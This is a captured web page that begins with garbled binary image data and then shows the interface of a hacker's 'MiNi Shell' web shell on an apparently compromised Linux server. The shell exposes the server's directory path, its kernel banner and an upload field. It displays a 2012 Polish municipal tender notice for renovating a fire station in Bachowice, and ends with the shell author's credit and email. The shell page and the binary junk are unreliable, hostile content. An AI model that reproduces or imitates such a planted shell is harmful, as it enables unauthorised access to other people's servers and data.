JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120924/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120924/363062-N-2012.html

<p class="kh_header"><b>Spytkowice: Zmiana sposobu użytkowania, remont  istniejącego  budynku  komunalnego  Domu Strażaka w Bachowicach, ul. Ks Gołby 33  wraz  z  modernizacja części  bojowej remizy  Ochotniczej  Straży  Pożarnej w Bachowicach ul. Ks.Gołby 33</b><br>
<b>Numer ogłoszenia: 363062 - 2012; data zamieszczenia: 24.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Spytkowice , ul. Zamkowa 12, 34-116 Spytkowice, woj. małopolskie, tel. 033 8791820, faks 033 8791560.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spytkowice.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiana sposobu użytkowania, remont  istniejącego  budynku  komunalnego  Domu Strażaka w Bachowicach, ul. Ks Gołby 33  wraz  z  modernizacja części  bojowej remizy  Ochotniczej  Straży  Pożarnej w Bachowicach ul. Ks.Gołby 33.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zmiana sposobu użytkowania, remont  istniejącego  budynku  komunalnego  Domu Strażaka w Bachowicach, ul.Ks Gołby 33  wraz  z  modernizacja części  bojowej remizy  Ochotniczej  Straży  Pożarnej w Bachowicach ul. Ks.Gołby 33
33   zakres robót obejmuje :

Zadanie  nr 1   -Modernizacja części  bojowej  remizy Ochotniczej  Straży  Pożarnej  w Bachowicach   n.w zakres tj, 

1. Roboty ogólnobudowlane.
1)	rozebranie ścian ,filarów, kolumn z cegieł na zaprawie cementowo-wapiennej - 27,5 m2.
2)	wykonanie ścianek działowych pełnych z cegieł dziurawek ? ceg. - 21,55 m2.
3)	wykonanie tynków wewnętrznych zwykłych kat. III - 177,75 m2.
4)	wykonanie posadzki epoksydowej  typu Plastidur EWS-S gr. 6 mm- 99,5 m2.
5)	wykonanie posadzki z płytek z kamieni sztucznych  - 57,43 m2.
6)	licowanie ścian płytkami z kamieni sztucznych - - 55,5 m2.
7)	wykonanie gładzi gipsowych - 284,87 m2.
8)	dwukrotne malowanie ścian wewnętrznych - 398,75 m2.
9)	obsadzenie prefabrykowanych podokienników - 11szt.
10)	wykucie muru oraz montaż drzwi p.poż. EI -30.
11)	montaż ościeżnic i skrzydeł drzwiowych  wewnątrzlokalowych - 3 szt.

2.Roboty instalacyjne.
1)  demontaż oraz montaż zlewozmywaka żeliwnego - 1szt.
2)  demontaż umywalki porcelanowe - 3 szt.
3) demontaż ustępu z miską porcelanową - 1 szt.
4) wymiana rurociągu z PCW o śr. 110 mm w gotowych wykopach, 
 wewnątrz budynku - 32m.
5)  wymiana podejścia odpływowego z PCW o śr. 50 mm - 28 szt.
6) wymiana rurociągu stalowego o połączeniach gwintowanych o śr. 20 mm- 28m.
7) montaż umywalek pojedynczych - 2szt.
8)  montaż baterii umywalkowych - 3 szt.
9)   wymiana termy elektrycznej - 3szt.
10) wymiana brodzików natryskowych z tworzywa sztucznego wraz z montażem kabiny prysznicowej - 1szt.
11) wymiana rurociągu stalowego o połączeniach spawanych o śr. 20 mm - 18,5 m.
12) wymiana rurociągu stalowego o śr. 15 mm o połączeniach spawanych  - 12,5 m.
13) wymiana grzejnika stalowego dwupłytowego GP- 4 o wysokości 1060 mm - 8szt.
14) wymiana zaworu termostatycznego o śr. 20-25 mm - 8szt.
15) wymiana zaworu przelotowego - 8 szt.
16) wymiana rurociągu stalowego o śr. 25 mm o połączeniach spawanych  - 10,8 m.
17) wymiana pieca gazowego wieloczerpalnego - 1 szt.
18) wymiana kuchni gazowej  4 -palnikowej  - 1 szt.




3.Roboty elektryczne.
1)  wymiana przewodów układanych pod tynkiem kabelkowych okrągłych - 133m.
2)  wymiana gniazd instalacyjnych wtykowych uszczelnionych 2-biegunowych - 14szt.
3) wymiana uszczelnionego wyłącznika , przełącznika jednobiegunowego - 14 szt.
4)  wymiana opraw oświetleniowych świetlówkowych do 3x40 W - 13 szt.
Zgodnie z dokumentacją projektową zgłoszeniową i  przedmiarem robót, który stanowi   załącznik nr 2 do Specyfikacji istotnych warunków zamówienia.

4.  Termin  zakończenia   robót  zadania nr  1  :  do dnia  20.11.2012r
 
Zadanie  nr 2   - Zmiana  sposobu użytkowania, remont  istniejącego  budynku  komunalnego  Domu Strażaka w Bachowicach, ul.Ks Gołby 33  n.w zakres tj, 
1.  Roboty rozbiórkowe.
1)	rozbiórka rur spustowych z blachy ocynkowanej- 80 m.
2)	rozbiórka rynien dachowych z blachy ocynkowanej - 104,5 m.
3)	rozbiórka obróbek blacharskich z blachy ocynkowanej - 87,42 m2.
4)	rozbiórka pokrycia dachowego 2xpapa na betonie- 501,47m2.
5)	rozbiórka kominów wolnostojących z cegły ceramicznej pełnej - 8,54 m3
6)	demontaż armatury wodno- kanalizacyjnej i centralnego ogrzewania.

2.  Roboty ogólnobudowlane.
1)	wykonanie kominów wolnostojących wieloprzewodowych z cegły ceramicznej pełnej - 8,54 m3.
2)  deskowanie, zbrojenie oraz wykonanie betonowania czapek kominowych - 0,64 m3.
3)  wykonanie pokrycia dachu z papy podkładowej asfaltowej na lepiku - 510, 47 m2.
4)  wykonanie pokrycia dachu z papy podkładowej termozgrzewalnej  - 510, 47 m2
5)  wykonanie pokrycia dachowego z membrany hydroizolacyjnej  typu  MATAKA -ELA 100 FOL  - 522, 30 m2.
6) wykonanie obróbek blacharskich oraz montaż rynien , rur spustowych oraz listew                 do montażu obróbek membrany dachowej .
7)  montaż podokienników z blachy stalowej powlekanej - 51 szt.
8)  ocieplenie ścian budynku płytami styropianowymi grubości 10 cm wraz z dyblowaniem siatką oraz tynkami cienkowarstwowymi akrylowymi - 772,26 m2.
9) ocieplenie ościeży styropianem wraz z wykonaniem tynku cienkowarstwowego akrylowego - 59,82 m2.
10) wymiana stolarki okiennej PCV i drzwi zewnętrznych   - 9,32 m2.
11) wykonanie nadproży stalowych z INP 200 - 8,20 mb.
12)	 wykonanie tynków typu Marmolit na ścianach wewnętrznych - 145 m2.
13)	 uzupełnienie ścian działowych gr. 12,6 cm z cegły dziurawki - 16,58 m2.
14)	 osadzenie stolarki drzwiowej wewnętrznej  szer. 80 i 90 cm - 33 szt.
15)	 montaż drzwi p.poż. EI30 - 2,1 m2.
16)	 uzupełnienie tynków wewnętrznych kat. III - 94,5 m2.
17)	 licowanie ścian płytkami ceramicznymi - 94,46  m2.
18)	 licowanie ścian płytkami z kamieni sztucznych - 36,10 m2.
19)	 wykonanie gładzi gipsowych - 516,9 m2.
20)	 malowanie ścian wewnętrznych - 1482,51 m2.
21)	cyklinowanie, lakierowanie posadzki parkietowej - 217 m2.


3.  Roboty instalacyjne.
1) wymiana rurociągu stalowego o połączeniach spawanych fi 25- 78m, fi 20-56m,
  fi 15-146 m.
 2) wymiana rurociągu stalowego o połączeniach gwintowanych fi 25 -43m, fi 20 -50 m,    
  fi 15 - 130m.
 3) wymiana zlewozmywaka -3szt,  umywalki- 10 szt,  ustęp kompakt - 7 szt,  wanny- 1 szt,
   pisuaru - 1szt,  termy  elektrycznej - 8 szt,  podgrzewacza ciepłej wody - 2 szt.
 4)  wymiana  grzejników stalowych typ  PURMO  C11, C22 - 16 szt.
 5) demontaż istniejącego i montaż nowego pieca gazowego c.o. jednofunkcyjnego 
  o mocy ok. 60 kV.

4. Roboty elektryczne.
1) wymiana wyłączników jednobiegunowych 6A p/t nieuszczelnionego - 21szt oraz 
    uszczelnionego - 15szt.
2) wymiana gniazd wtykowych p/t jednobiegunowych 2P,10A - 23 szt.
3) wymiana gniazd instalacyjnych wtykowych n/t uszczelnionych 2P+Z, 10A/16 - 21szt.
4) montaż opraw oświetleniowych 3x40V , 2x40V- 24 szt.
5) zwody, poziomy i pionowe instalacji odgromowej , przewody nienaprężane  poziome -           160 mb. oraz  przewody naprężane - 86 mb.

5.Urządzenie terenu
1)  montaż korytek betonowych - 122 m2.
2)  profilowanie, zagęszczanie podłoża, wykonanie podbudowy z kruszywa warstwa dolna                 i górna - 122,2m2.
3) wykonanie nawierzchni z kostki bruk gr. 8cm wraz z krawężnikami bet  - 122,2 m2.

Zgodnie z dokumentacją projektową zgłoszeniową  i  przedmiarem robót, który stanowi   załącznik nr 3 do Specyfikacji istotnych warunków zamówienia.

Termin  zakończenia   robót  zadania nr 2  do dnia 30.05.2013r  

Uwaga:    Prace budowlane będą prowadzone na częściowo  czynnym obiekcie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  postępowaniu  mogą wziąć  udział wykonawcy  nie wykluczeni na podstawie              art. 24  ustawy z dnia 29 stycznia 2004 roku  Prawo Zamówień Publicznych  spełniający warunki i wymagania  w Specyfikacji istotnych warunków zamówienia  oraz art. 22 ustawy Prawo zamówień publicznych.Ocena spełnienia  tego warunku na podstawie złożonych  dokumentów i oświadczeń  zasada spełnia  nie /spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadanej wiedzy i doświadczenia: wykonawca wykaże wykonanie  w ciągu  ostatnich  5 lat  jednej  roboty budowlanej   odpowiadającej wielkością  i rodzajem  robotom budowlanym stanowiącym przedmiot zamówienia tj,  budowa, przebudowa lub remont  budynku  o wartości minimum 100.000 zł netto.Ocena spełnienia  tego warunku na podstawie złożonych  dokumentów zasada spełnia  nie /spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie  dysponowania  odpowiednim potencjałem  technicznym oraz osobami zdolnymi do wykonania zamówienia tj, 
a)  do pełnienia  funkcji  kierownika  budowy  - osoby   z uprawnieniami  budowlanymi    bez ograniczeń konstrukcyjno budowlanymi         
   b )  do pełnienia  funkcji  kierownika   robót 
-    z uprawnieniami budowlanymi w zakresie sieci instalacji sanitarnych tj,  wodno  
    kanalizacyjnej , c.o, gaz
-   z uprawnieniami budowlanymi w zakresie sieci instalacji elektrycznych 
Ocena spełnienia  tego warunku na podstawie złożonego  oświadczenia zasada spełnia  nie /spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  wykaże  polisę, a w przypadku jej braku  innego dokumentu  potwierdzającego, że Wykonawca jest  ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia minimum 100.000 zł  Ocena spełnienia  tego warunku na podstawie złożonego  dokumentu  zasada spełnia  nie /spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  formularz ofertowy   ( załącznik   do SIWZ) 
   2 )  kosztorys  ofertowy    -    ( uproszczony   dwa miejsca po przecinku )   wykonany zgodnie 
z   przedmiarem robót   opracowany  metodą  kalkulacji uproszczonej  z  padaniem cen  jednostkowych  z narzutami  ( załącznik   do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)  w przypadku wystąpienia niesprzyjających warunków atmosferycznych (kataklizm) oraz 
wystąpienie siły wyższej np.: trąby powietrznej, pożaru, powodzi   lub  z  przyczyn 
technologicznych albo technicznych powodujących konieczność całkowitego przerwania   robót, co zostanie uzasadnione potwierdzaniem   przez inspektora nadzoru wpisem do dziennika budowy,  wówczas   termin realizacji  zadania zostanie przedłużony o taką ilość dni kalendarzowych na jaką  roboty zostały  przerwane prace.
b) wystąpienia konieczności wykonania robót dodatkowych ( nieprzewidzianych i niezbędny do wykonania   zamówienia )
2) Zamawiający dopuszcza zmianę kierownika robót,  oraz innych osób biorących po stronie Wykonawcy i Zamawiającego, którzy  biorą  udział w realizacji zamówienia w sytuacji zdarzeń losowych uniemożliwiających mu pełnienie jego funkcji z zastrzeżeniem, że taka zmiana musi nastąpić na osoby, które spełniają warunki określone w SIWZ.. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na zmianę  terminu  wykonania robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spytkowice.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Spytkowicach pok.nr 21 w godzinach pracy Urządu Gminy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2012 godzina 10:00, miejsce: Urząd Gminy w Spytkowicach  pok.nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> część bojowa  w ramach konkursu   Małoplskie Remizy 2012.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com